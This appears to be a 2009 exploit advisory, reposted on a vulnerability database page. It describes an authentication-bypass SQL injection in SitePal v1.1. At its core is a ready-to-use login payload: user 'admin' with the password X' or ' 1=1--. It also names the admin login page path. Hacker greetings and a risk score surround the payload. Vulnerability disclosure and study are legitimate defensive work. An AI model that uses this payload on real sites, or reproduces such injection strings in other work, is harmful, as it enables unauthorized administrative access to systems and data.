SitePal v1.1(Auth Bypass) SQL Injection Vulnerability

🗓️ 15 Dec 2009 00:00:00Reported by RootType

SitePal v1.1 has a remote SQL injection vulnerability allowing admin login bypass.


                                                [~] SitePal v1.1(Auth Bypass) Remote SQL Injection Vulnerability
[~]
[~] ----------------------------------------------------------
[~] author: R3d-D3v!L
[~]
[~] Date: 15.12.2009
[~] 7!M3:1-35
[~] Home: www.Xp10.ME
[~]
[~] contact: N/A
[~]
[~] -----------------------------------------------------------


[~] Exploit:


username:admin
password: X' or ' 1=1--

[~] admin login for demo:

server/SitePalDemo/z_admin_login.asp



[~]--------------------------------------------------------------------------------
[~] Greetz tO:dolly &amp; ab0 mohammed &amp; XP_10 h4CK3R&amp;  JASM!N &amp; c0prA &amp; MY-M!ND ;)
[~]
[~] mkank.com
[~] spechial thanks :{off-s3c} &amp; ((dolly)) &amp; ((7am3m)) &amp; dev!l_mody &amp; 0R45hy &amp; meg4 ;)
[~]
[?] 4.!.5 ---&gt; ((r3d D3v!L))--M2Z--DEV!L_Ro07--JUPA--.....
[~]
[~]I4M:4r48!4N-3XPLO!73R

[~]
[~]--------------------------------------------------------------------------------

15 Dec 2009 00:00Current

7.1High risk

Vulners AI Score7.1

sitepal vulnerability admin login sql injection remote exploit